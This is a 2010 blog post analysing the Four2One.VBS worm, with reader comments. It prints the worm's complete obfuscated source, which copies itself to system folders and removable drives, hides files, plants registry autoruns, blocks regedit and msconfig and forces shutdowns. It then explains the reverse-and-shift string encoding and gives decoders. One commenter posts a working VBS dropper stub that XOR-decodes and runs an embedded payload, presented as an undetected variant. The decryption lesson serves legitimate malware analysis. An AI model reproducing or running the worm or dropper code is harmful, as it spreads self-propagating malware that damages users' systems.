MorphostLab

Where Morphic and friends hang out

Let's Decrypt the Four2One.VBS Worm!

Posted by Morphic on July 23, 2010


This may be an old VBS worm, but I only just got a sample of it from one of my friends. This worm uses an encryption technique that, at first glance, left me puzzled for a moment…

but something let me find the decryption code in one second, just by looking at the clue.
So I'll teach you how to read the encryption technique of a VBS worm.

The sample we'll take is the Four2One.VBS worm.

Here is its source.
'four2one.virus ver 2.0

on error resume next
dim rekur,syspath,windowpath,desa,twoone,mf,misi,tf,four2,nt,check,sd, Dn,Wd,Hn,Mn,nae, viti,ld,gap,nowd, recy

misi = ReAd( "^ovspuvb\" ) & vbcrlf & ReAd( "tcw/fmdzdfs!fyf/uqjsdtx>fuvdfyfmmfit" )

html = ReAd( "?#86!;uihjfi!<576!;iuejx!<722!;ugfm!<93!;qpu!fmzut!wje=?#111111$#>spmpdhc!zepc=" ) & vbcrlf &_
ReAd( "?wje0=?q0=?uopg0=1/3!sfw!!fop3svpg!n(j?#8#>f{jt!#fuspG#>fdbg!#DDDDDD$#>spmpd!uopg=?#sfuofd#>ohjmb!q=" ) & vbcrlf &_
ReAd( "?#2.!;yfeoj.{!<79!;qpu!<112!;ugfm!fmzut!obqt=?#sfuofd#>ohjmb!q=" ) & vbcrlf &_
ReAd( "?obqt0=?#115#>uihjfi!#117#>iuejx!#HQK/922:521K0SPD17CVQ0USBQJMD0fdjggP!ugptpsdjN0tfmjG!nbshpsQ0;D#>dst!#1#>sfespc!hnj=" ) & vbcrlf &_
ReAd( "?#2!;yfeoj.{!<79!;qpu!<112!;ugfm!fmzut!obqt=" ) & vbcrlf &_
ReAd( "?q0=?#sfuofd#>ohjmb!q=?q0=?obqt0=?#115#>uihjfi!#117#>iuejx!#hqk/fmhpph]34nfutzt]txpeojx];d#>dst!#1#>sfespc!hnj=" ) & vbcrlf &_
ReAd( "?#73!;uihjfi!<576!;iuejx!<722!;ugfm!<2:5!;qpu!fmzut!wje=" ) & vbcrlf &_
ReAd( "?#sfuofd#>ohjmb!q=?wje0=?q0=?c0=?uopg0=9113!mjsqB!82?#DDDDDD$#>spmpd!#5#>f{jt!#lppcmppidT!zsvuofD#>fdbg!uopg=?c=?#sfuofd#>ohjmb!q=" )

explor= ReAd( "uyfo!fnvtfs!spssf!op" ) & vbcrlf & _
ReAd( "qx!-et!-fnbOxfO!-fnbOemP!njE" ) & vbcrlf & _
ReAd( "*#udfkcPnfutzTfmjG/hojuqjsdT#)udfkcpfubfsd!>!pd!uft" ) & vbcrlf & _
ReAd( "*#mmfit/uqjsdtX#)udfkcpfubfsd!>!et!uft" ) & vbcrlf & _
ReAd( "*1)sfempgmbjdfqtufh/pd!>!qx!ufT" ) & vbcrlf & _
ReAd( "#mme/bovuspG]34nfutzt]txpeojx];d#!>!fnbOemP" ) & vbcrlf & _
ReAd( "#tcw/fop3svpg]34nfutzt]txpeojx];d#!>!fnbOxfO" ) & vbcrlf & _
ReAd( "ftmbg!-fnbOxfO!-fnbOemP!fmjgzqpd/pd" ) & vbcrlf & _
ReAd( "ofiu!96!>!sfcnvO/ssF!gj" ) & vbcrlf & _
ReAd( "ftmf" ) & vbcrlf & _
ReAd( "#tcw/fop3svpg]34nfutzt]txpeojx];d#!ovs/et" ) & vbcrlf & _
ReAd( "!gj!eof" ) & vbcrlf & _
ReAd( "#fyf/sfspmqyf]#!'!qx!ovs/et" )

recy = ReAd( "uyfo!fnvtfs!spssf!op" ) & vbcrlf & _
ReAd( "qx!-et!-fnbOxfO!-fnbOemP!njE" ) & vbcrlf & _
ReAd( "*#udfkcPnfutzTfmjG/hojuqjsdT#)udfkcpfubfsd!>!pd!uft" ) & vbcrlf & _
ReAd( "*#mmfit/uqjsdtX#)udfkcpfubfsd!>!et!uft" ) & vbcrlf & _
ReAd( "*1)sfempgmbjdfqtufh/pd!>!qx!ufT" ) & vbcrlf & _
ReAd( "#ojc/fmdzdfS]#!>!fnbOemP" ) & vbcrlf & _
ReAd( "#tcw/fop3svpg]34nfutzt]txpeojx];d#!>!fnbOxfO" ) & vbcrlf & _
ReAd( "ftmbg!-fnbOxfO!-fnbOemP!fmjgzqpd/pd" ) & vbcrlf & _
ReAd( "ofiu!96!>!sfcnvO/ssF!gj" ) & vbcrlf & _
ReAd( "ftmf" ) & vbcrlf & _
ReAd( "#tcw/fop3svpg]34nfutzt]txpeojx];d#!ovs/et" ) & vbcrlf & _
ReAd( "!gj!eof" ) & vbcrlf & _
ReAd( "fnbommvGuqjsdT/uqjsdtX!'!#!-udfmft0-f0!fyf/sfspmqyf]#!'!qx!ovs/et" )

set twoone = createobject(ReAd( "udfkcPnfutzTfmjG/hojuqjsdT" ))
set mf = twoone.getfile (Wscript.ScriptFullname)
set four2 = createobject( ReAd( "mmfiT/uqjsdTX") )
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

Wd = weekday(Now)
Hn = hour(now)
Mn = minute(now)

Set windowpath = twoone.getspecialfolder(0)
Set syspath = twoone.getspecialfolder(1)

viti=date*1+421000014.0421
set tf = twoone.createtextfile(windowpath & ReAd( "mme/fubembdpm]" ),false)
tf.write viti
tf.close
set tf = twoone.getfile(windowpath & ReAd( "mme/fubembdpm]" ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( "tcw/fop3svpg]" ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( "tcw/fop3svpg]" ),2,true)
tf.write rekur
tf.close
set tf = twoone.getfile(syspath &ReAd( "tcw/fop3svpg]" ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( "mme/bovuspG]" ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( "mme/bovuspG]" ),2,true)
tf.write rekur
tf.close
set tf = twoone.getfile(syspath & ReAd( "mme/bovuspG]" ))
tf.attributes = 39

set tf = twoone.getfile(syspath & ReAd( "tcw/sfspmqyf]" ))
tf.attributes = 39
set tf = twoone.createtextfile(syspath & ReAd( "tcw/sfspmqyf]" ))
tf.write explor
tf.close
set tf = twoone.getfile(syspath & ReAd( "tcw/sfspmqyf]" ))
tf.attributes = 39

set tf=twoone.createtextfile(syspath & ReAd( "nui/fmhpph]" ),2,true)
tf.write html
tf.close
set tf = twoone.getfile(syspath & ReAd( "nui/fmhpph]" ))
tf.attributes=39

twoone.CopyFile syspath & ReAd( "hqk/fmhppH]" ), "c:\", true
twoone.CopyFile syspath & ReAd( "nui/fmhppH]" ), "c:\", true

for each desa in twoone.drives
If (desa.drivetype = 1 or desa.drivetype = 2) and desa.path <> "A:" and desa.path <> "C:" then

set tf=twoone.getfile(desa.path & ReAd( "ojc/fmdzdfS]" ))
tf.attributes =39
set tf=twoone.createtextfile(desa.path & ReAd( "ojc/fmdzdfS]" ),2,true)
tf.write rekur
tf.close
set tf=twoone.getfile(desa.path & ReAd( "ojc/fmdzdfS]" ))
tf.attributes = 39

set tf=twoone.getfile(desa.path & ReAd( "tcw/fmdzdfS]" ))
tf.attributes =39
set tf=twoone.createtextfile(desa.path & ReAd( "tcw/fmdzdfS]" ),2,true)
tf.write recy
tf.close
set tf=twoone.getfile(desa.path & ReAd( "tcw/fmdzdfS]" ))
tf.attributes = 39

set tf =twoone.getfile(desa.path & ReAd( "goj/ovspuvb]" ))
tf.attributes = 32
set tf=twoone.createtextfile(desa.path & ReAd( "goj/ovspuvb]" ),2,true)
tf.write misi
tf.close
set tf = twoone.getfile(desa.path & ReAd( "goj/ovspuvb]" ))
tf.attributes=39

twoone.CopyFile syspath & ReAd( "hqk/fmhppH]" ), desa.path & "\", true
twoone.CopyFile desa.path & ReAd( "hqk/fmhppH]" ), syspath & "\", true
end if
next

set four2 = createobject( ReAd( "mmfiT/uqjsdTX") )
four2.regwrite ReAd( "topjuqPsfempGpO]sfspmqyF]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ),"1",ReAd("ESPXE`HFS")
four2.regwrite ReAd( "shnltbUfmcbtjE]nfutzt]tfjdjmpQ]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ),"1",ReAd("ESPXE`HFS")
four2.regwrite ReAd( "ofeejI]efdobweB]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ),"0",ReAd("ESPXE`HFS")
four2.regwrite ReAd( "nfutzTugptpsdjN]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI" ), syspath & ReAd( "tcw/fop3svpg]" )

four2.regwrite ReAd( "fnbOfqzUzmeofjsG]fmjGTCW]UPPS`TFTTBMD`ZFLI" ), ReAd( "opjtofuyF!opjubdjmqqB" )
four2.regwrite ReAd( "uyFxpiTsfwfO]fmjGTCW]UPPS`TFTTBMD`ZFLI" ),""
four2.regwrite ReAd( "]opdJumvbgfE]fmjGTCW]UPPS`TFTTBMD`ZFLI" ), four2.RegRead (ReAd( "fmjgmme]UPPS`TFTTBMD`ZFLI" ) & ReAd( "]opdJumvbgfE]" ))
four2.regwrite ReAd( "eobnnpD]ujeF]mmfiT]fmjGTCW]UPPS`TFTTBMD`ZFLI" ), ""

four2.regwrite ReAd( "sfhhvcfe]fyf/ujefhfs]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ),ReAd( "fyf/ebqfupo" )
four2.regwrite ReAd( "sfhhvcfe]fyf/hjgopdtn]topjuqP!opjuvdfyF!fmjG!fhbnJ]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ),ReAd( "fyf/ebqfupo" )

'four2.regwrite ReAd( "effqTldjmDfmcvpE]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI"), "1"

set mf = twoone.getfile(windowpath & ReAd( "mme/fubembdpm]" ))
set ld = mf.openastextstream(1)
dn = ld.readline
nowd=date*1+421000000.0421
gap=nowd-dn

if gap>0 Then
four2.regwrite ReAd( "fhbQ!usbuT]ojbN]sfspmqyF!ufosfuoJ]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ), ReAd( "nui/fmhppH];d" )
four2.regwrite ReAd( "]dfyffee]fspmqyf]mmfit]sfempG]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ),""
four2.regwrite ReAd( "]eobnnpd]fspmqyf]mmfit]sfempG]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ), ReAd( "tcw/sfspmqyf]34nfutzt]txpeojx];d!!fyf/uqjsdTX]34nfutzT]txpeojx];d" )
four2.regwrite ReAd( "b]VSNovS]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ), ReAd( "tvsjw/fop3svpg" )
four2.regwrite ReAd( "utjMVSN]VSNovS]sfspmqyF]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI" ), "a"
four2.regwrite ReAd( "uvPfnjUfwbToffsdT]qpultfE]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI" ),"60"
four2.regwrite ReAd( "fyf/fwbtosdT]qpultfE]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI" ), ReAd( "sdt/e4uyfutt]]34nfutzt]]TXPEOJX]];D" )
four2.regwrite ReAd( "hojsuTzbmqtjE]E4uyfU]tsfwbtoffsdT]ugptpsdjN]fsbxugpT]SFTV`UOFSSVD`ZFLI"), ReAd( "1/3!sfw!fop3svpg!n(j" )
four2.regwrite ReAd( "zujwjujtofTftvpN]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI" ),"1"
four2.regwrite ReAd( "effqTftvpN]ftvpN]mfobQ!mpsuopD]SFTV`UOFSSVD`ZFLI" ),"0"
nae = four2.RegRead (ReAd( "sfoxPefsfutjhfS]opjtsfWuofssvD]UO!txpeojX]ugptpsdjN]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ))
four2.regwrite ReAd( "]mmfit]sfempg]tfttbmD]FSBXUGPT]FOJIDBN`MBDPM`ZFLI" ) & nae & ReAd( "]eobnnpd]fN!ub!lppm!ftbfmQ!t(" ),ReAd( "FYF/FSPMQYFJ" ),"REG_EXPAND_SZ"
if Wd = 5 and Hn > 12 then
set sd = createobject(ReAd( "mmfit/uqjsdtX" ))
sd.run ReAd( "1!u.!t.!fyf/oxpeuvit" )
else
if Mn = 9 or Mn = 19 or Mn = 29 or Mn = 39 or Mn = 49 or Mn = 59 then
twoone.CopyFile four2.SpecialFolders(ReAd( "uofdfs" )) & ReAd( "lom/hqk/+]" ), four2.SpecialFolders(ReAd( "qpultfE" )) & "\", true
set sd = createobject(ReAd( "mmfit/uqjsdtX" ))
sd.run ReAd( "FYF/FSPMQYFJ" )
end if
end if
end if

if check <> 1 then
Wscript.sleep 80000
end if
loop while check <> 1
set sd = createobject(ReAd( "mmfit/uqjsdtX" ))
sd.run windowpath & ReAd( "!-udfmft0-f0!fyf/sfspmqyf]" ) & Wscript.ScriptFullname

Function ReAd( WriTe )
Dim Son, ToLo, Yo
Son = ""
For ToLo = 1 To Len( WriTe )
Yo = Mid( WriTe, ToLo, 1 )
Son = Chr( Asc( Yo ) - 1 ) & Son
Next
ReAd = Son
End Function

Alright,
what let me find the clue was "CreateObject".
This string is always followed by Wscript.ScriptFullname or wscript.shell and the like…

Then I checked this string: "mmfit/uqjsdtX"
Count its LEN and compare it with WSCRIPT.SHELL
Exactly the same!!

Then look at its features too! The virus's string has one doubled letter, "mm", while WSCRIPT.SHELL has the doubled letter "ll" (at the opposite end)
So clearly the encryption technique used is STRREVERSE.

OK! We have the first key. The next key is a LETTER SHIFT!!
If the worm shifts the letter "L" into "M", that means one is added to each character. So to decrypt it we subtract one!

The steps needed to turn it back are:
1. convert each letter into a number
2. then subtract one from each number
3. then convert it back into a letter.
4. Don't forget the STRREVERSE technique, because this worm uses it.

Which gives the following code:
Private Sub Command1_Click()
Dim Kode As String
Dim i As Integer
Dim HasilAkhir As String
' put the ReAd( "..." ) argument you want to decrypt here
Kode = "ScriptYangKamuBingungKan"
Kode = StrReverse(Kode)
For i = 1 To Len(Kode)
HasilAkhir = HasilAkhir & Chr(Asc(Mid(Kode, i, 1)) - 1)
Next
MsgBox HasilAkhir
End Sub

One click of the button and the result is out! 😀

All done
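To make the analysis above mechanical, here is an added Python decoder (not from the original post or from the worm's author). It implements the two clues as checks, the LEN match and the mirrored doubled letter, derives the shift from a CreateObject() argument instead of guessing it, and then decodes every ReAd("...") string in a listing; the sample lines are copied from the worm source above, and the KNOWN_PLAINTEXTS list of COM class names is an assumption.

```python
import re

# Sample lines copied from the Four2One.VBS listing above (quotes normalised).
SAMPLE_LISTING = r'''
set twoone = createobject(ReAd( "udfkcPnfutzTfmjG/hojuqjsdT" ))
set four2 = createobject( ReAd( "mmfiT/uqjsdTX") )
set tf = twoone.getfile(syspath & ReAd( "tcw/fop3svpg]" ))
four2.regwrite ReAd( "nfutzTugptpsdjN]ovS]opjtsfWuofssvD]txpeojX]ugptpsdjN]fsbxugpT]FOJIDBN`MBDPM`ZFLI" ), syspath & ReAd( "tcw/fop3svpg]" )
'''

# Assumption: the COM class names a VBS dropper's CreateObject() usually takes.
KNOWN_PLAINTEXTS = ("WScript.Shell", "Scripting.FileSystemObject", "Shell.Application")

# Matches ReAd( "..." ) with straight or WordPress-style curly quotes.
READ_CALL = re.compile(r'ReAd\(\s*["“]([^"”]*)["”]\s*\)')


def decode(obfuscated, shift=1):
    """Undo the worm's ReAd(): walk the string backwards and subtract `shift`
    from every character code (ReAd prepends Chr(Asc(c) - 1) to its result,
    which shifts and reverses in a single loop)."""
    return "".join(chr(ord(c) - shift) for c in reversed(obfuscated))


def doubled_positions(s):
    """Indices i with s[i] == s[i+1]: the 'mm' versus 'll' clue from the post."""
    return [i for i in range(len(s) - 1) if s[i] == s[i + 1]]


def matches_doubled_clue(obfuscated, candidate):
    """The post's second clue made mechanical: a doubled letter starting at
    index i of the ciphertext must start at index len-2-i of the plaintext,
    because a constant shift keeps doubled letters doubled and the reversal
    mirrors their position."""
    n = len(obfuscated)
    mirrored = sorted(n - 2 - i for i in doubled_positions(obfuscated))
    return mirrored == doubled_positions(candidate.casefold())


def infer_shift(obfuscated, candidates=KNOWN_PLAINTEXTS):
    """Recover the shift instead of guessing it: for each candidate of equal
    length (the post's LEN check) that passes the doubled-letter clue, derive
    the shift from the first plaintext character and confirm it decodes the
    whole string. Returns (shift, candidate) or None."""
    for cand in candidates:
        if len(cand) != len(obfuscated) or not matches_doubled_clue(obfuscated, cand):
            continue
        shift = ord(obfuscated[-1]) - ord(cand[0])
        if decode(obfuscated, shift).casefold() == cand.casefold():
            return shift, cand
    return None


def decode_listing(listing, shift=1):
    """Decode every ReAd("...") argument in a listing, in order of appearance."""
    return [(m, decode(m, shift)) for m in READ_CALL.findall(listing)]


if __name__ == "__main__":
    shift, cls = infer_shift("mmfiT/uqjsdTX")
    print(f"shift {shift} recovered via {cls}")
    for obf, plain in decode_listing(SAMPLE_LISTING, shift):
        print(f"{obf!r} -> {plain!r}")
```

Decoding the full listing this way exposes the file names and registry paths the worm writes, which is the list a defender needs for cleanup and detection.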

by: Morphic
http://www.morphostlab.com
(Free health consultation, come on!!)

thanks to:
EDE

22 Responses to "Let's Decrypt the Four2One.VBS Worm!"

  1. serviks said

    Oh, so Morphic wants to wipe out my virus?
    Well, that's fine, as long as it isn't smadav that wipes out my virus.

    By serviks maker

  2. Akhmad Efendi said

    On Error Resume Next
    Dim fso, ws
    Set fso = CreateObject("scripting.filesystemobject")
    Set ws = CreateObject("wscript.Shell")
    Set sh = CreateObject("Shell.application")
    Q=WScript.ScriptFullName
    tmp=fso.GetSpecialFolder(1)
    tn=fso.GetTempName
    tmpt=tmp+"\"+tn
    Set swt=WScript.Arguments
    If swt.Count>0 Then
    status=swt(0)
    If status="auto" Then
    sh.Explore Left(WScript.ScriptFullName,3)
    Else
    status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status
    If fso.FolderExists(status) Then
    sh.Explore status
    Else
    fso.CreateFolder status
    sh.Explore status
    End If
    End If
    Else
    End If
    Set QQ=fso.GetFile(Q)
    Set Q1=QQ.OpenAsTextStream(1,0)
    isiQ=Q1.Read(QQ.Size)
    Q1.close
    t1=InStr(1,isiQ,"Windows Serviks"+" >>>",0)+18
    isiQ=Right(isiQ,Len(isiQ)-t1)
    hsl=""
    For v=1 To Len(isiQ)
    t=Asc(Mid(isiQ,v,1))
    hsl=hsl+Chr(t Xor 7)
    Next
    If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
    Set temporary=fso.OpenTextFile(tmpt,2,True,0)
    temporary.Write hsl
    temporary.Close
    ws.Run "WScript.exe //e:VBScript "+tmpt+" """+Q+""""

    The code above belongs to the latest Yuyun, which hasn't been detected yet.

  3. Morphic said

    For EDE:
    http://www.4shared.com/file/p2zBFm7c/Decryptor.html

  4. shafry said

    But the decryptor is already there at the very bottom, isn't it 😀

    • Morphic said

      hehe, right.
      I didn't see it..
      lol 😀😀😀😀😀

      but after looking at it, the worm owner's decryptor code seems a bit convoluted.

    • Morphic said

      Function ReAd( WriTe )
      Dim Son, ToLo, Yo
      Son = ""
      For ToLo = 1 To Len( WriTe )
      Yo = Mid( WriTe, ToLo, 1 )
      Son = Chr( Asc( Yo ) - 1 ) & Son

      Next
      ReAd = Son
      End Function

      the bolded part could actually have been a single line…

  5. QANTA said

    Mr Morphic, I downloaded Morphost Expert Plus, and after I used it to scan my computer it closed by itself before the scan had finished; its RTP couldn't be activated either. Is it because I run it alongside AVAST Pro 2010? Please enlighten me?

    • Morphic said

      Yes. You are the umpteenth person to report a Morphost bug.
      The Morphost bug that is still being talked about online to this day is "Morphost closing during scanning"
      This case does occur on some computers, and we haven't managed to fix this problem completely.

      If Morphost's RTP doesn't activate, it is usually because the OS isn't compatible, for example Win7 and Vista. To get RTP running on these two OSes you have to right-click RTP and choose "Run As Admin"

      Hope this helps.

  6. Den my said

    Sir, I want to ask: "Malware.IDB-5" was detected by your antivirus, sir; the question is why it can't be deleted / quarantined?.. please, sir, what's the solution?……….

    – this started from a shortcut virus..

    • Morphic said

      oh,
      malware.idb-5 is our heuristic.
      now, the reason it can't be deleted or quarantined is that the file is still active. Its process hasn't died or hasn't been terminated yet.

      Now,
      which shortcut virus do you mean??
      is there a connection?

  7. satryacode said

    Nice ….
